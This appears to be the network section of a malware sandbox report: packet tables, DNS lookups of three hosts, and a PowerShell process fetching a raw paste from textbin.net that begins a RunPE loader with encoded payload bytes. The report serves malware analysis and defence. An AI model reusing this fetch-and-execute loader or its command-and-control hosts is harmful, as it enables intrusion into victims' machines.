May 16, 2022 19:29:25.749751091 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:25.750066996 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:25.916713953 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:25.926120996 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.096271992 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.142754078 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.312984943 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.398729086 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.566886902 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.613223076 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:26.779700994 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:26.841624975 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:28.585848093 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:28.751506090 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:28.751575947 CEST	1433	49732	199.102.48.248	192.168.2.6
May 16, 2022 19:29:28.751646042 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:32.445399046 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.445431948 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.445535898 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.463372946 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.463395119 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.740195036 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.740400076 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.744647026 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.744666100 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.745124102 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:32.767550945 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:32.808511019 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325170994 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325243950 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325254917 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325309038 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325320005 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325337887 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325364113 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325396061 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325443983 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325459957 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325514078 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325531960 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325537920 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.325566053 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.325591087 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455578089 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455651045 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455728054 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455749035 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455795050 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455802917 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455825090 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455836058 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455863953 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455919981 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.455930948 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455960035 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.455979109 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.456053019 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:33.456053972 CEST	443	49736	148.72.177.212	192.168.2.6
May 16, 2022 19:29:33.456127882 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:29:39.377161026 CEST	49736	443	192.168.2.6	148.72.177.212
May 16, 2022 19:30:11.231482983 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.311487913 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:11.311681032 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.365575075 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.449233055 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:11.453147888 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:11.537846088 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:11.603240967 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:13.857485056 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:13.989433050 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:13.989521980 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:14.115329027 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.339171886 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:28.474633932 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.475187063 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:28.560847998 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.659367085 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:28.739330053 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:28.846860886 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:29.005824089 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:29.143980026 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:29.144100904 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:29.284409046 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:36.902765989 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:36.956994057 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:37.036195993 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:37.160083055 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:42.760745049 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:42.894182920 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:42.899678946 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:42.980964899 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:43.060327053 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:43.140104055 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:43.238131046 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:43.378133059 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:43.380743027 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:43.519058943 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:57.599153996 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:57.738063097 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:57.738670111 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:57.820067883 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:57.915271044 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:57.994707108 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:58.037329912 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:58.174985886 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:30:58.175116062 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:30:58.316981077 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:06.903903008 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:07.111088037 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:07.190395117 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:07.416074038 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:11.945168018 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:12.081605911 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:12.081692934 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:12.162750959 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:12.307121038 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:12.396595001 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:12.439177990 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:12.581274986 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:12.581398964 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:12.721962929 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:26.397614956 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:26.534434080 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:26.536211014 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:26.634124041 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:26.808327913 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:26.889825106 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:26.959536076 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:27.100819111 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:27.100924969 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:27.246337891 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:36.938508034 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:36.981158972 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:37.059994936 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:37.106110096 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:40.837167025 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:40.974735975 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:40.974868059 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:41.055546045 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:41.106414080 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:41.185501099 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:41.198474884 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:41.334373951 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:41.334458113 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:41.475019932 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:55.293860912 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:55.427993059 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:55.429342985 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:55.510808945 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:55.654612064 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:55.733831882 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:55.768084049 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:55.912163973 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:31:55.912390947 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:31:56.053045034 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:06.937112093 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:07.046168089 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:07.126018047 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:07.358681917 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:09.760946989 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:09.896738052 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:09.896847963 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:09.977977037 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:10.046395063 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:10.125825882 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:10.193877935 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:10.335460901 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:10.335557938 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:10.474704027 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:24.250471115 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:24.381264925 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:24.381344080 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:24.462374926 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:24.547641039 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:24.626805067 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:24.860198975 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:25.707370996 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:25.849580050 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:25.849678040 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:25.990294933 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:36.954513073 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:37.001909018 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:37.081618071 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:37.126830101 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:38.653460026 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:38.787084103 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:38.787208080 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:38.868732929 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:38.908246994 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:38.987477064 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:38.999836922 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:39.130816936 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:39.130980968 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:39.271599054 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:53.109172106 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:53.240433931 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:53.240528107 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:53.321048975 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:53.362627029 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:53.441909075 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:53.466949940 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:53.599663973 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:32:53.599786043 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:32:53.740349054 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:06.969902039 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:07.098212004 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:07.177344084 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:07.381140947 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:07.561050892 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:07.693466902 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:07.693568945 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:07.774812937 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:07.816895008 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:07.896058083 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:07.921184063 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:08.053335905 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:08.053468943 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:08.193464994 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:22.380242109 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:22.521795988 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:22.521877050 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:22.602780104 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:22.646328926 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:22.725553989 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:22.766319990 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:22.896687031 CEST	9217	49759	91.193.75.216	192.168.2.6
May 16, 2022 19:33:22.896857023 CEST	49759	9217	192.168.2.6	91.193.75.216
May 16, 2022 19:33:23.037322044 CEST	9217	49759	91.193.75.216	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2022 19:29:25.418298006 CEST	51748	53	192.168.2.6	8.8.8.8
May 16, 2022 19:29:25.580914021 CEST	53	51748	8.8.8.8	192.168.2.6
May 16, 2022 19:29:32.415848970 CEST	61116	53	192.168.2.6	8.8.8.8
May 16, 2022 19:29:32.434875965 CEST	53	61116	8.8.8.8	192.168.2.6
May 16, 2022 19:30:11.087301970 CEST	51666	53	192.168.2.6	8.8.8.8
May 16, 2022 19:30:11.223953962 CEST	53	51666	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 16, 2022 19:29:25.418298006 CEST	192.168.2.6	8.8.8.8	0x536d	Standard query (0)	SQL8003.site4now.net	A (IP address)	IN (0x0001)
May 16, 2022 19:29:32.415848970 CEST	192.168.2.6	8.8.8.8	0xfa49	Standard query (0)	textbin.net	A (IP address)	IN (0x0001)
May 16, 2022 19:30:11.087301970 CEST	192.168.2.6	8.8.8.8	0x6904	Standard query (0)	sky01.publicvm.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 16, 2022 19:29:25.580914021 CEST	8.8.8.8	192.168.2.6	0x536d	No error (0)	SQL8003.site4now.net	199.102.48.248	A (IP address)	IN (0x0001)
May 16, 2022 19:29:32.434875965 CEST	8.8.8.8	192.168.2.6	0xfa49	No error (0)	textbin.net	148.72.177.212	A (IP address)	IN (0x0001)
May 16, 2022 19:30:11.223953962 CEST	8.8.8.8	192.168.2.6	0x6904	No error (0)	sky01.publicvm.com	91.193.75.216	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

textbin.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49736	148.72.177.212	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-16 17:29:32 UTC	0	OUT	GET /raw/gia9ab2dg0 HTTP/1.1 Host: textbin.net Connection: Keep-Alive
2022-05-16 17:29:33 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2022 17:29:33 GMT Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.29 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 X-RateLimit-Limit: 60 X-RateLimit-Remaining: 59 Set-Cookie: XSRF-TOKEN=eyJpdiI6IlFud2Q3ZldnVzFcL0d5TkI1XC9FOWVLZz09IiwidmFsdWUiOiJCenQ3TDBKUzFDZ3pqTkQ3V1laV25nc2l6YUJzUUdkUXJcL2xIU204Mm9XdWFacEpoN0cxTGlDMkhWM1JGbzVHQyIsIm1hYyI6IjhmNzg2MDkyNjAzNDlkNjhiMTU5ZTIxYTgwYjRhYTE4Y2JmNzljODM3MmE4YjE5ODBjNTUxZTg5ZmFlNWEyYmQifQ%3D%3D; expires=Mon, 16-May-2022 19:29:33 GMT; Max-Age=7200; path=/ Set-Cookie: textbin_session=eyJpdiI6InlISW13dTZuMEJHbkMrTlBUXC96QW5nPT0iLCJ2YWx1ZSI6IjJvKzV0ZERhMkpuU2xzZVdjN0tYaklZQjlCOXhkalwvSXBQTzZxcUZRUTlKZkNTQUV6Q1RPb3JsNkVTRWM1cDZvIiwibWFjIjoiZDhlYTM2OGIwODY1YTFjMDQ5YWI4MzJlZjBiZDcyYzIxNzQ5NmZkYjdhOTdiOWU0YmFiMzBkOTVhNTg0YTYwMSJ9; expires=Mon, 16-May-2022 19:29:33 GMT; Max-Age=7200; path=/; httponly Vary: Accept-Encoding Strict-Transport-Security: max-age=15768000; includeSubDomains X-Powered-By: PleskLin
2022-05-16 17:29:33 UTC	1	IN	Data Raw: 31 63 32 36 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 4d 69 63 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 57 65 62 0d 0a 0d 0a 5b 42 79 74 65 5b 5d 5d 20 24 52 55 4e 50 45 20 3d 20 40 28 33 31 2c 31 33 39 2c 38 2c 30 2c 30 2c 30 2c 30 2c 30 Data Ascii: 1c26Add-Type -AssemblyName System.Windows.FormsAdd-Type -AssemblyName Microsoft.VisualBasicAdd-Type -AssemblyName Microsoft.CSharpAdd-Type -AssemblyName System.ManagementAdd-Type -AssemblyName System.Web[Byte[]] $RUNPE = @(31,139,8,0,0,0,0,0
2022-05-16 17:29:33 UTC	16	IN	Data Raw: 61 64 25 32 34 25 61 65 25 32 66 25 30 30 25 38 35 25 65 38 25 61 62 48 4d 25 66 61 25 61 61 25 39 61 37 25 31 36 25 62 65 25 61 32 5f 25 38 32 52 25 65 32 25 62 64 68 25 39 35 25 62 38 25 38 39 64 25 61 34 25 65 65 35 25 64 31 25 34 30 25 31 37 25 61 38 2d 64 25 32 63 25 38 35 25 38 31 25 35 62 25 34 30 25 63 65 50 25 63 36 25 39 36 25 34 30 25 30 66 25 65 61 6e 25 64 63 44 25 66 36 0d 0a 32 30 30 30 0d 0a 25 65 38 25 61 62 29 25 61 65 69 25 33 62 51 25 38 62 2e 25 38 31 6d 34 25 66 37 25 30 66 52 25 38 33 25 63 66 25 63 35 25 37 66 53 25 32 63 62 25 38 39 25 37 66 25 32 33 6e 54 25 31 35 25 62 66 25 61 34 25 63 34 42 25 64 37 25 31 31 7a 2a 25 38 35 25 64 36 25 64 31 58 25 62 62 25 30 33 5f 25 61 31 25 63 31 25 31 66 25 61 31 51 25 66 63 25 36 30 6a 25 Data Ascii: ad%24%ae%2f%00%85%e8%abHM%fa%aa%9a7%16%be%a2_%82R%e2%bdh%95%b8%89d%a4%ee5%d1%40%17%a8-d%2c%85%81%5b%40%ceP%c6%96%40%0f%ean%dcD%f62000%e8%ab)%aei%3bQ%8b.%81m4%f7%0fR%83%cf%c5%7fS%2cb%89%7f%23nT%15%bf%a4%c4B%d7%11z*%85%d6%d1X%bb%03_%a1%c1%1f%a1Q%fc%60j%
2022-05-16 17:29:33 UTC	32	IN	Data Raw: 25 38 32 25 65 30 25 31 62 25 37 64 25 39 66 42 25 66 62 69 25 34 30 25 61 66 25 31 38 2a 25 66 63 72 25 38 65 57 25 66 34 25 39 36 25 37 66 25 31 39 2d 25 64 66 5a 25 66 34 25 65 62 2a 25 35 64 25 35 63 25 65 62 25 32 35 25 61 39 25 63 61 25 39 36 25 63 64 41 25 63 32 25 66 62 73 25 38 38 72 69 25 66 31 43 25 63 62 74 31 25 61 66 25 31 33 25 66 63 25 39 32 25 65 37 25 61 63 25 61 61 25 38 62 70 25 31 36 25 38 64 25 66 38 25 33 64 0d 0a 32 30 30 30 0d 0a 25 38 36 25 38 36 25 66 62 37 25 63 35 25 65 66 25 31 30 6f 25 61 36 25 64 37 25 38 64 25 63 35 25 63 64 25 65 65 25 61 33 25 30 35 25 62 61 25 64 38 25 39 30 45 25 64 30 25 63 37 25 66 30 25 38 62 25 30 63 4f 31 25 62 63 25 39 33 25 65 31 25 32 33 25 64 63 25 65 36 25 32 35 25 38 36 25 63 66 25 62 61 25 Data Ascii: %82%e0%1b%7d%9fB%fbi%40%af%18%fcr%8eW%f4%96%7f%19-%dfZ%f4%eb%5d%5c%eb%25%a9%ca%96%cdA%c2%fbs%88ri%f1C%cbt1%af%13%fc%92%e7%ac%aa%8bp%16%8d%f8%3d2000%86%86%fb7%c5%ef%10o%a6%d7%8d%c5%cd%ee%a3%05%ba%d8%90E%d0%c7%f0%8b%0cO1%bc%93%e1%23%dc%e6%25%86%cf%ba%
2022-05-16 17:29:33 UTC	48	IN	Data Raw: 61 25 66 38 25 61 34 25 38 65 25 64 39 25 38 66 25 36 30 25 61 61 71 25 32 62 25 65 63 4e 25 62 36 25 32 36 25 39 33 25 66 31 25 66 30 25 66 38 25 31 63 25 61 61 28 25 61 63 25 61 34 31 25 66 36 45 25 64 33 25 62 34 25 64 31 25 64 33 34 74 46 25 30 38 25 30 64 25 32 66 25 61 32 25 62 35 25 32 36 25 31 32 25 61 31 25 64 39 25 66 31 25 63 38 25 33 63 25 64 62 25 37 65 25 39 61 25 62 63 68 25 64 64 2e 25 64 30 25 33 61 25 38 65 25 38 38 32 25 31 62 25 38 63 25 31 66 48 57 25 30 64 0d 0a 35 65 39 33 0d 0a 25 30 35 25 65 33 58 25 63 65 25 61 65 38 25 64 36 25 66 36 25 62 30 25 39 31 59 61 25 66 35 25 61 31 25 32 35 25 64 61 25 30 64 25 64 33 25 63 31 25 30 63 25 63 66 25 61 66 25 63 34 25 38 65 25 39 63 25 30 61 4f 25 63 66 25 63 35 39 55 25 33 62 25 62 66 25 Data Ascii: 